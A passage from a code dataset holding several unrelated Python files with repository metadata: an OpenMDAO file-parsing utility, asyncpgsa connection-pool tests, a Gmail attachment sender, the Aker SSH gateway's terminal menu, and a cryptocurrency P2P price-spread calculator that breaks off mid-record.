ValueError(msg)\n\n j1 = self._current_row + rowstart\n j2 = self._current_row + rowend + 1\n lines = list(self._data[j1:j2])\n\n if self._delimiter == \"columns\":\n if fieldend:\n line = lines[0][(fieldstart - 1):fieldend]\n else:\n line = lines[0][(fieldstart - 1):]\n\n parsed = self._parse_line().parseString(line)\n row = np.array(parsed[:])\n data = np.zeros(shape=(abs(j2 - j1), len(row)))\n data[0, :] = row\n\n for i, line in enumerate(list(lines[1:])):\n if fieldend:\n line = line[(fieldstart - 1):fieldend]\n else:\n line = line[(fieldstart - 1):]\n\n parsed = self._parse_line().parseString(line)\n data[i + 1, :] = np.array(parsed[:])\n else:\n parsed = self._parse_line().parseString(lines[0])\n if fieldend:\n row = np.array(parsed[(fieldstart - 1):fieldend])\n else:\n row = np.array(parsed[(fieldstart - 1):])\n\n data = np.zeros(shape=(abs(j2 - j1), len(row)))\n data[0, :] = row\n\n for i, line in enumerate(list(lines[1:])):\n parsed = self._parse_line().parseString(line)\n\n if fieldend:\n try:\n data[i + 1, :] = np.array(parsed[(fieldstart - 1):fieldend])\n except Exception:\n print(data)\n else:\n data[i + 1, :] = np.array(parsed[(fieldstart - 1):])\n\n return data\n\n def _parse_line(self):\n \"\"\"\n Parse a single data line that may contain string or numerical data.\n\n Float and Int 'words' are converted to their appropriate type.\n Exponentiation is supported, as are NaN and Inf.\n\n Returns\n -------\n \n the parsed line.\n \"\"\"\n return self.line_parse_token\n\n def _reset_tokens(self):\n \"\"\"\n Set up the tokens for pyparsing.\n \"\"\"\n # Somewhat of a hack, but we can only use printables if the delimiter is\n # just whitespace. Otherwise, some seprators (like ',' or '=') potentially\n # get parsed into the general string text. So, if we have non whitespace\n # delimiters, we need to fall back to just alphanums, and then add in any\n # missing but important symbols to parse.\n if self._delimiter.isspace():\n textchars = printables\n else:\n textchars = alphanums\n\n symbols = ['.', '/', '+', '*', '^', '(', ')', '[', ']', '=',\n ':', ';', '?', '%', '&', '!', '#', '|', '<', '>',\n '{', '}', '-', '_', '@', '$', '~']\n\n for symbol in symbols:\n if symbol not in self._delimiter:\n textchars = textchars + symbol\n\n digits = Word(nums)\n dot = \".\"\n sign = oneOf(\"+ -\")\n ee = CaselessLiteral('E') | CaselessLiteral('D')\n\n num_int = _ToInteger(Combine(Optional(sign) + digits))\n\n num_float = _ToFloat(Combine(\n Optional(sign) +\n ((digits + dot + Optional(digits)) | (dot + digits)) +\n Optional(ee + Optional(sign) + digits)\n ))\n\n # special case for a float written like \"3e5\"\n mixed_exp = _ToFloat(Combine(digits + ee + Optional(sign) + digits))\n\n nan = (_ToInf(oneOf(\"Inf -Inf\")) |\n _ToNan(oneOf(\"NaN nan NaN% NaNQ NaNS qNaN sNaN 1.#SNAN 1.#QNAN -1.#IND\")))\n\n string_text = Word(textchars)\n\n self.line_parse_token = (OneOrMore((nan | num_float | mixed_exp | num_int | string_text)))\n", "repo_name": "OpenMDAO/OpenMDAO", "sub_path": "openmdao/utils/file_wrap.py", "file_name": "file_wrap.py", "file_ext": "py", "file_size_in_byte": 34305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 451, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyparsing.TokenConverter", "line_number": 16, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 170, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 196, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 222, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 248, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 310, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 354, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 453, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 500, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 550, "usage_type": "call"}, {"api_name": "pyparsing.ParserElement.setDefaultWhitespaceChars", "line_number": 689, "usage_type": "call"}, {"api_name": "pyparsing.ParserElement", "line_number": 689, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 929, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 942, "usage_type": "call"}, {"api_name": "numpy.str_", "line_number": 945, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 946, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 948, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 953, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 953, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 955, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 955, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1007, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1008, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1018, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1022, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1024, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1026, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1034, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1038, "usage_type": "call"}, {"api_name": "pyparsing.printables", "line_number": 1066, "usage_type": "name"}, {"api_name": "pyparsing.alphanums", "line_number": 1068, "usage_type": "name"}, {"api_name": "pyparsing.Word", "line_number": 1078, "usage_type": "call"}, {"api_name": "pyparsing.nums", "line_number": 1078, "usage_type": "argument"}, {"api_name": "pyparsing.oneOf", "line_number": 1080, "usage_type": "call"}, {"api_name": "pyparsing.CaselessLiteral", "line_number": 1081, "usage_type": "call"}, {"api_name": "pyparsing.Combine", "line_number": 1083, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1083, "usage_type": "call"}, {"api_name": "pyparsing.Combine", "line_number": 1085, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1086, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1087, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1088, "usage_type": "call"}, {"api_name": "pyparsing.Combine", "line_number": 1092, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1092, "usage_type": "call"}, {"api_name": "pyparsing.oneOf", "line_number": 1094, "usage_type": "call"}, {"api_name": "pyparsing.oneOf", "line_number": 1095, "usage_type": "call"}, {"api_name": "pyparsing.Word", "line_number": 1097, "usage_type": "call"}, {"api_name": "pyparsing.OneOrMore", "line_number": 1099, "usage_type": "call"}]} +{"seq_id": "35151197031", "text": "import sqlalchemy as sa\n\n\nasync def test_pool_basic(pool):\n async with pool.acquire() as con:\n result = await con.fetch('SELECT * FROM sqrt(16)')\n assert result[0]['sqrt'] == 4.0\n\n\nasync def test_pool_connection_transaction_context_manager(pool):\n async with pool.transaction() as conn:\n result = await conn.fetch('SELECT * FROM sqrt(16)')\n\n assert result[0]['sqrt'] == 4.0\n\n\nasync def test_use_sqlalchemy_with_escaped_params(pool):\n \"\"\"\n Use sqlalchemy with escaped params\n Make sure that the escaped parameters get used in the right order\n :return:\n \"\"\"\n query = sa.select('*') \\\n .select_from(sa.text('sqrt(:num) as a')) \\\n .select_from(sa.text('sqrt(:a2) as b')) \\\n .select_from(sa.text('sqrt(:z3) as c')) \\\n .params(num=16, a2=36, z3=25)\n async with pool.transaction() as conn:\n result = await conn.fetch(query)\n\n row = result[0]\n assert row['a'] == 4.0\n assert row['b'] == 6.0\n assert row['c'] == 5.0\n\n\nasync def test_use_sa_core_objects(pool):\n pg_tables = sa.Table(\n 'pg_tables', sa.MetaData(),\n sa.Column('schemaname'),\n sa.Column('tablename'),\n sa.Column('tableowner'),\n sa.Column('tablespace'),\n sa.Column('hasindexes')\n )\n\n query = pg_tables.select().where(pg_tables.c.schemaname == 'pg_catalog')\n async with pool.transaction() as conn:\n result = await conn.fetch(query)\n\n for row in result:\n # just making sure none of these throw KeyError exceptions\n assert isinstance(row['schemaname'], str)\n assert 'tablename' in row\n assert 'tableowner' in row\n assert 'tablespace' in row\n assert 'hasindexes' in row\n\n\nasync def test_with_without_async_should_throw_exception(pool):\n try:\n with pool.transaction() as conn:\n result = await conn.fetch('SELECT * FROM sqrt(16)')\n\n raise Exception('Should have thrown RuntimeError')\n except RuntimeError as e:\n assert str(e) == 'Must use \"async with\" for a transaction'\n\nasync def test_falsyness_of_rows_on_fetch(pool):\n async with pool.acquire() as conn:\n rows = await conn.fetch('SELECT * FROM pg_stat_activity '\n 'WHERE pid=400')\n assert bool(rows) == False\n", "repo_name": "CanopyTax/asyncpgsa", "sub_path": "tests/test_pool.py", "file_name": "test_pool.py", "file_ext": "py", "file_size_in_byte": 2300, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 411, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.select", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 39, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 40, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 41, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 43, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "30647574825", "text": "import smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders\n\n\ndef send_email(my_email):\n fromaddr = my_email.fromaddr\n toaddr = my_email.toaddr\n msg = MIMEMultipart()\n msg['From'] = fromaddr\n msg['To'] = toaddr\n msg['Subject'] = \"Subject of the Mail\"\n body = \"Body_of_the_mail\"\n msg.attach(MIMEText(body, 'plain'))\n filename = my_email.filepath.rpartition('\\\\')[-1]\n attachment = open(my_email.filepath, \"rb\")\n p = MIMEBase('application', 'octet-stream')\n p.set_payload(attachment.read())\n encoders.encode_base64(p)\n p.add_header('Content-Disposition', \"attachment; filename= %s\" % filename)\n msg.attach(p)\n s = smtplib.SMTP('smtp.gmail.com', 587)\n s.ehlo()\n s.starttls()\n s.login(fromaddr, my_email.password)\n text = msg.as_string()\n s.sendmail(fromaddr, toaddr, text)\n s.quit()\n\ndef main(my_email):\n send_email(my_email)\n\nif __name__ == '__main__':\n main(my_email)", "repo_name": "petyapython/pack_and_send", "sub_path": "send.py", "file_name": "send.py", "file_ext": "py", "file_size_in_byte": 1041, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 11, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 16, "usage_type": "call"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 19, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 21, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 21, "usage_type": "name"}, {"api_name": "smtplib.SMTP", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "3054141243", "text": "__license__ = \"AGPLv3\"\n__author__ = 'Ahmed Nazmy '\n\n\nimport urwid\nimport aker\nimport signal\nimport logging\nimport os\nfrom popup import SimplePopupLauncher\n\n\nclass Listing(urwid.ListBox):\n \"\"\"\n Base class to handle listbox actions\n \"\"\"\n\n def __init__(self, items=None):\n self.search = Search()\n self.search.update_text(\"Type to search:\\n\")\n self._items = []\n if items is not None:\n for item in items:\n listitem = MenuItem(\"%s\" % (item))\n self._items.append(\n urwid.AttrMap(\n listitem,\n 'body',\n focus_map='SSH_focus'))\n super(Listing, self).__init__(urwid.SimpleFocusListWalker(self._items))\n\n def updatelist(self, items):\n self.empty()\n for item in items:\n self.add_item(item)\n\n def add_item(self, item):\n listitem = MenuItem(\"%s\" % (item))\n self.body.append(\n urwid.AttrMap(\n listitem,\n 'body',\n focus_map='SSH_focus'))\n\n def empty(self):\n del self.body[:] # clear listbox\n\n def get_selected(self):\n return self.focus\n\n def get_box(self):\n self.search.clear()\n return urwid.Frame(urwid.AttrWrap(self, 'body'), header=self.search)\n\n\nclass HostList(Listing):\n \"\"\"\n Class to handle hosts screen actions,\n keypresses for now.\n \"\"\"\n\n def __init__(self, hosts=None):\n super(HostList, self).__init__(hosts)\n\n def keypress(self, size, key):\n if (key == 'enter') or (key == 'right'):\n urwid.emit_signal(\n self,\n 'connect',\n self.focus.original_widget.get_caption())\n key = None\n elif key == 'esc':\n if self.search.get_edit_text() == \"\":\n key = 'left'\n else:\n self.search.clear()\n key = None\n # Unless its arrow keys send keypress to search box,\n # implies emitting EditBox \"change\" signal\n elif key not in ['right', 'down', 'up', 'left', 'page up', 'page down']:\n self.search.keypress((10,), key)\n return super(HostList, self).keypress(size, key)\n\n\nclass HostGroupList(Listing):\n \"\"\"\n Class to handle hostgroups screen actions,\n keypresses for now.\n \"\"\"\n\n def __init__(self, hostgroups=None):\n super(HostGroupList, self).__init__(hostgroups)\n\n def keypress(self, size, key):\n if (key == 'enter') or (key == 'right'):\n # emit signal to call hostgroup_chosen_handler with MenuItem caption,\n # caption is group name showing on screen\n if self.focus is not None:\n urwid.emit_signal(\n self,\n 'group_chosen',\n self.focus.original_widget.get_caption())\n key = None\n elif key == 'esc':\n self.search.clear()\n key = None\n # Unless its arrow keys send keypress to search box,\n # implies emitting EditBox \"change\" signal\n elif key not in ['right', 'down', 'up', 'left', 'page up', 'page down']:\n self.search.keypress((10,), key)\n return super(HostGroupList, self).keypress(size, key)\n\n\nclass Header(urwid.Columns):\n def __init__(self, text):\n self.text = text\n self.header_widget = urwid.Text(self.text, align='left')\n self.popup = SimplePopupLauncher()\n self.popup_padding = urwid.Padding(self.popup, 'right', 20)\n self.popup_map = urwid.AttrMap(self.popup_padding, 'indicator')\n self.header_map = urwid.AttrMap(self.header_widget, 'head')\n super(Header, self).__init__([self.header_map, self.popup_map])\n\n def update_text(self, text):\n self.text = text\n self.header_map.original_widget.set_text(self.text)\n\n def popup_message(self, message):\n logging.debug(\"TUI: popup message is {0}\".format(message))\n self.popup.message = str(message)\n self.popup.open_pop_up()\n\n\nclass Footer(urwid.AttrMap):\n def __init__(self, text):\n self.footer_text = urwid.Text(text, align='center')\n super(Footer, self).__init__(self.footer_text, 'foot')\n\n\nclass Search(urwid.Edit):\n def __init__(self):\n super(Search, self).__init__()\n\n def update_text(self, caption):\n self.set_caption(caption)\n\n def clear(self):\n self.set_edit_text(\"\")\n\n\nclass MenuItem(urwid.Text):\n def __init__(self, caption):\n self.caption = caption\n urwid.Text.__init__(self, self.caption)\n\n def keypress(self, size, key):\n return key\n\n def selectable(self):\n return True\n\n def get_caption(self):\n return str(self.caption)\n\n\nclass Window(object):\n \"\"\"\n Where all the Tui magic happens,\n handles creating urwid widgets and\n user interactions\n \"\"\"\n\n def __init__(self, aker_core):\n self.aker = aker_core\n self.user = self.aker.user\n self.current_hostgroup = \"\"\n self.set_palette()\n\n def set_palette(self):\n self.palette = [\n ('body', 'black', 'light gray'), # Normal Text\n ('focus', 'light green', 'black', 'standout'), # Focus\n ('head', 'white', 'dark gray', 'standout'), # Header\n ('foot', 'light gray', 'dark gray'), # Footer Separator\n ('key', 'light green', 'dark gray', 'bold'),\n ('title', 'white', 'black', 'bold'),\n ('popup', 'white', 'dark red'),\n ('msg', 'yellow', 'dark gray'),\n ('SSH', 'dark blue', 'light gray', 'underline'),\n ('SSH_focus', 'light green', 'dark blue', 'standout')] # Focus\n\n def draw(self):\n self.header_text = [\n ('key', \"Aker\"), \" \",\n ('msg', \"User:\"),\n ('key', \"%s\" % self.user.name), \" \"]\n\n self.footer_text = [\n ('msg', \"Move:\"),\n ('key', \"Up\"), \",\",\n ('key', \"Down\"), \",\",\n ('key', \"Left\"), \",\",\n ('key', \"Right\"), \",\",\n ('key', \"PgUp\"), \",\",\n ('key', \"PgDn\"), \",\",\n ('msg', \"Select:\"),\n ('key', \"Enter\"), \" \",\n ('msg', \"Refresh:\"),\n ('key', \"F5\"), \" \",\n ('msg', \"Quit:\"),\n ('key', \"F9\"), \" \",\n ('msg', \"By:\"),\n ('key', \"Ahmed Nazmy\")]\n\n # Define widgets\n self.header = Header(self.header_text)\n self.footer = Footer(self.footer_text)\n self.hostgrouplist = HostGroupList(list(self.user.hostgroups.keys()))\n self.hostlist = HostList(list(self.user.allowed_ssh_hosts.keys()))\n self.topframe = urwid.Frame(\n self.hostgrouplist.get_box(),\n header=self.header,\n footer=self.footer)\n self.screen = urwid.raw_display.Screen()\n\n # Register signals\n urwid.register_signal(HostList, ['connect'])\n urwid.register_signal(HostGroupList, ['group_chosen'])\n\n # Connect signals\n urwid.connect_signal(\n self.hostgrouplist.search,\n 'change',\n self.group_search_handler)\n urwid.connect_signal(\n self.hostgrouplist,\n 'group_chosen',\n self.group_chosen_handler)\n urwid.connect_signal(\n self.hostlist.search,\n 'change',\n self.host_search_handler)\n urwid.connect_signal(\n self.hostlist,\n 'connect',\n self.host_chosen_handler)\n\n self.loop = urwid.MainLoop(\n self.topframe,\n palette=self.palette,\n unhandled_input=self._input_handler,\n screen=self.screen,\n pop_ups=True)\n\n def _input_handler(self, key):\n if not urwid.is_mouse_event(key):\n if key == 'f5':\n self.update_lists()\n elif key == 'f9':\n logging.info(\n \"TUI: User {0} logging out of Aker\".format(\n self.user.name))\n raise urwid.ExitMainLoop()\n elif key == 'left':\n # For now if its not hostgroup window left should bring it up\n if self.topframe.get_body() != self.hostgrouplist.get_box():\n self.current_hostgroup = \"\"\n self.hostlist.empty()\n self.header.update_text(self.header_text)\n self.topframe.set_body(self.hostgrouplist.get_box())\n else:\n logging.debug(\n \"TUI: User {0} unhandled input : {1}\".format(\n self.user.name, key))\n\n def group_search_handler(self, search, search_text):\n logging.debug(\n \"TUI: Group search handler called with text {0}\".format(search_text))\n matchinghostgroups = []\n for hostgroup in self.user.hostgroups.keys():\n if search_text in hostgroup:\n logging.debug(\n \"TUI: hostgroup {1} matches search text {0}\".format(\n search_text, hostgroup))\n matchinghostgroups.append(hostgroup)\n self.hostgrouplist.updatelist(matchinghostgroups)\n\n def host_search_handler(self, search, search_text):\n logging.debug(\n \"TUI: Host search handler called with text {0}\".format(search_text))\n matchinghosts = []\n for host in self.user.hostgroups[self.current_hostgroup].hosts:\n if search_text in host:\n logging.debug(\n \"TUI: host {1} matches search text {0}\".format(\n search_text, host))\n matchinghosts.append(host)\n self.hostlist.updatelist(sorted(matchinghosts))\n\n def group_chosen_handler(self, hostgroup):\n logging.debug(\n \"TUI: user %s chose hostgroup %s \" %\n (self.user.name, hostgroup))\n self.current_hostgroup = hostgroup\n self.hostlist.empty()\n matchinghosts = []\n for host in self.user.hostgroups[self.current_hostgroup].hosts:\n logging.debug(\n \"TUI: host {1} is in hostgroup {0}, adding\".format(\n hostgroup, host))\n matchinghosts.append(host)\n self.hostlist.updatelist(sorted(matchinghosts))\n header_text = [\n ('key', \"Aker\"), \" \",\n ('msg', \"User:\"),\n ('key', \"%s\" % self.user.name), \" \",\n ('msg', \"HostGroup:\"),\n ('key', \"%s\" % self.current_hostgroup)]\n self.header.update_text(header_text)\n self.topframe.set_body(self.hostlist.get_box())\n\n def host_chosen_handler(self, choice):\n host = choice\n logging.debug(\"TUI: user %s chose server %s \" % (self.user.name, host))\n self.aker.init_connection(self.user.allowed_ssh_hosts[host])\n\n def update_lists(self):\n logging.info(\n \"TUI: Refreshing entries for user {0}\".format(\n self.aker.user.name))\n self.aker.user.refresh_allowed_hosts(False)\n self.hostgrouplist.empty()\n for hostgroup in self.user.hostgroups.keys():\n self.hostgrouplist.add_item(hostgroup)\n if self.current_hostgroup != \"\":\n self.hostlist.empty()\n for host in self.user.hostgroups[self.current_hostgroup].hosts:\n self.hostlist.add_item(host)\n self.header.popup_message(\"Entries Refreshed\")\n\n def start(self):\n logging.debug(\"TUI: tui started\")\n self.loop.run()\n\n def stop(self):\n logging.debug(u\"TUI: tui stopped\")\n raise urwid.ExitMainLoop()\n\n def pause(self):\n logging.debug(\"TUI: tui paused\")\n self.loop.screen.stop()\n urwid.emit_signal(self.loop.screen, urwid.display_common.INPUT_DESCRIPTORS_CHANGED)\n\n def restore(self):\n logging.debug(\"TUI restored\")\n self.loop.screen.start()\n urwid.emit_signal(self.loop.screen, urwid.display_common.INPUT_DESCRIPTORS_CHANGED)\n", "repo_name": "aker-gateway/Aker", "sub_path": "tui.py", "file_name": "tui.py", "file_ext": "py", "file_size_in_byte": 12044, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 562, "dataset": "github-code", "pt": "53", "api": [{"api_name": "urwid.ListBox", "line_number": 13, "usage_type": "attribute"}, {"api_name": "urwid.AttrMap", "line_number": 26, "usage_type": "call"}, {"api_name": "urwid.SimpleFocusListWalker", "line_number": 30, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 40, "usage_type": "call"}, {"api_name": "urwid.Frame", "line_number": 53, "usage_type": "call"}, {"api_name": "urwid.AttrWrap", "line_number": 53, "usage_type": "call"}, {"api_name": "urwid.emit_signal", "line_number": 67, "usage_type": "call"}, {"api_name": "urwid.emit_signal", "line_number": 99, "usage_type": "call"}, {"api_name": "urwid.Columns", "line_number": 114, "usage_type": "attribute"}, {"api_name": "urwid.Text", "line_number": 117, "usage_type": "call"}, {"api_name": "popup.SimplePopupLauncher", "line_number": 118, "usage_type": "call"}, {"api_name": "urwid.Padding", "line_number": 119, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 120, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 121, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 129, "usage_type": "call"}, {"api_name": "urwid.AttrMap", "line_number": 134, "usage_type": "attribute"}, {"api_name": "urwid.Text", "line_number": 136, "usage_type": "call"}, {"api_name": "urwid.Edit", "line_number": 140, "usage_type": "attribute"}, {"api_name": "urwid.Text", "line_number": 151, "usage_type": "attribute"}, {"api_name": "urwid.Text.__init__", "line_number": 154, "usage_type": "call"}, {"api_name": "urwid.Text", "line_number": 154, "usage_type": "attribute"}, {"api_name": "urwid.Frame", "line_number": 220, "usage_type": "call"}, {"api_name": "urwid.raw_display.Screen", "line_number": 224, "usage_type": "call"}, {"api_name": "urwid.raw_display", "line_number": 224, "usage_type": "attribute"}, {"api_name": "urwid.register_signal", "line_number": 227, "usage_type": "call"}, {"api_name": "urwid.register_signal", "line_number": 228, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 231, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 235, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 239, "usage_type": "call"}, {"api_name": "urwid.connect_signal", "line_number": 243, "usage_type": "call"}, {"api_name": "urwid.MainLoop", "line_number": 248, "usage_type": "call"}, {"api_name": "urwid.is_mouse_event", "line_number": 256, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 260, "usage_type": "call"}, {"api_name": "urwid.ExitMainLoop", "line_number": 263, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 272, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 277, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 282, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 289, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 294, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 301, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 308, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 324, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 328, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 342, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 346, "usage_type": "call"}, {"api_name": "urwid.ExitMainLoop", "line_number": 347, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 350, "usage_type": "call"}, {"api_name": "urwid.emit_signal", "line_number": 352, "usage_type": "call"}, {"api_name": "urwid.display_common", "line_number": 352, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 355, "usage_type": "call"}, {"api_name": "urwid.emit_signal", "line_number": 357, "usage_type": "call"}, {"api_name": "urwid.display_common", "line_number": 357, "usage_type": "attribute"}]} +{"seq_id": "38688017056", "text": "import time\nfrom prettytable import PrettyTable\n\nfrom coin_price import get_coin_price, get_p2p_price\nfrom check_prices import check_prices\nfrom table import create_table\n\nsumma = 5000\n\nstart = time.time()\n\np2pUSDTbuy = get_p2p_price('USDT', 'BUY', summa)\np2pBTCbuy = get_p2p_price('BTC', 'BUY', summa)\np2pBUSDbuy = get_p2p_price('BUSD', 'BUY', summa)\np2pBNBbuy = get_p2p_price('BNB', 'BUY', summa)\np2pETHbuy = get_p2p_price('ETH', 'BUY', summa)\np2pRUBbuy = get_p2p_price('RUB', 'BUY', summa)\n# p2pSHIBbuy = get_p2p_price('SHIB', 'BUY', summa)\n\np2pUSDTsell = get_p2p_price('USDT', 'SELL', summa)\np2pBTCsell = get_p2p_price('BTC', 'SELL', summa)\np2pBUSDsell = get_p2p_price('BUSD', 'SELL', summa)\np2pBNBsell = get_p2p_price('BNB', 'SELL', summa)\np2pETHsell = get_p2p_price('ETH', 'SELL', summa)\np2pRUBsell = get_p2p_price('RUB', 'SELL', summa)\n# p2pSHIBsell = get_p2p_price('SHIB', 'SELL', summa)\n\nspotUSDT = get_coin_price('USDT', 'RUB')\nspotBTC = get_coin_price('BTC', 'RUB')\nspotBUSD = get_coin_price('BUSD', 'RUB')\nspotBNB = get_coin_price('BNB', 'RUB')\nspotETH = get_coin_price('ETH', 'RUB')\n# spotSHIB = get_coin_price('SHIB', 'rub')\n\nth = ['COIN', '% input', 'p2p BUY', 'spot cost', 'p2p SELL', '% output']\ntd = [\n 'USDT', (spotUSDT - p2pUSDTbuy) / p2pUSDTbuy * 100, p2pUSDTbuy, spotUSDT, p2pUSDTsell,\n (p2pUSDTsell - spotUSDT) / spotUSDT * 100,\n 'BTC', (spotBTC - p2pBTCbuy) / p2pBTCbuy * 100, p2pBTCbuy, spotBTC, p2pBTCsell,\n (p2pBTCsell - spotBTC) / spotBTC * 100,\n 'BUSD', (spotBUSD - p2pBUSDbuy) / p2pBUSDbuy * 100, p2pBUSDbuy, spotBUSD, p2pBUSDsell,\n (p2pBUSDsell - spotBUSD) / spotBUSD * 100,\n 'BNB', (spotBNB - p2pBNBbuy) / p2pBNBbuy * 100, p2pBNBbuy, spotBNB, p2pBNBsell,\n (p2pBNBsell - spotBNB) / spotBNB * 100,\n 'ETH', (spotETH - p2pETHbuy) / p2pETHbuy * 100, p2pETHbuy, spotETH, p2pETHsell,\n (p2pETHsell - spotETH) / spotETH * 100\n]\n\ncolumns = len(th)\n\ntable = PrettyTable(th)\n\ntd_data = td[:]\n\nwhile td_data:\n table.add_row(td_data[:columns])\n td_data = td_data[columns:]\n\nprint(table) # Печатаем таблицу\n\nend = time.time()\n\nprint(\"The time of execution of above program is :\",\n (end - start) * 10 ** 3 / 1000, \"sec\")\n\ncoins = ['usdt', 'btc', 'busd', 'bnb', 'eth']\ncoins_buy = {'usdt': p2pUSDTbuy, 'btc': p2pBTCbuy, 'busd': p2pBUSDbuy, 'bnb': p2pBNBbuy, 'eth': p2pETHbuy}\ncoins_sell = {'usdt': p2pUSDTsell, 'btc': p2pBTCsell, 'busd': p2pBUSDsell, 'bnb': p2pBNBsell, 'eth': p2pETHsell}\ncoins_persents = {'usdt': (spotUSDT - p2pUSDTbuy) / p2pUSDTbuy * 100, 'btc': (spotBTC - p2pBTCbuy) / p2pBTCbuy * 100,\n 'busd': (spotBUSD - p2pBUSDbuy) / p2pBUSDbuy * 100, 'bnb': (spotBNB - p2pBNBbuy) / p2pBNBbuy * 100,\n 'eth': (spotETH - p2pETHbuy) / p2pETHbuy * 100}\nfor i in coins:\n for j in coins:\n if j != i:\n st = 10000\n st /= coins_buy[i]\n st /= get_coin_price(i, j)\n st *= coins_sell[j]\n if 0 < (st - 10000) / 10000 < 10:\n print(i + '/' + j)\n print((st - 10000) / 10000 * 100)\n\nrubs_coins = ['ADA', 'ALGO', 'ARB', 'ARPA', 'BNB', 'BTC', 'BUSD', 'DOT', 'ETH', 'LTC', 'MATIC', 'NEAR', 'NEO', 'SOL',\n 'XRP']\nbest = max(coins_persents, key=coins_persents.get)\nprint(best)\nfor i in rubs_coins:\n try:\n st = 10000\n st /= coins_buy[best]\n st /= get_coin_price(i, best)\n st *= get_coin_price(i, 'rub')\n print(i)\n print((st - 10000) / 10000 * 100)\n except:\n pass\n", "repo_name": "dez1ros/find_p2p_spred_binance", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3557, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 10, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 12, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 13, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 14, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 15, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 16, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 17, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 20, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 21, "usage_type": "call"}, {"api_name": 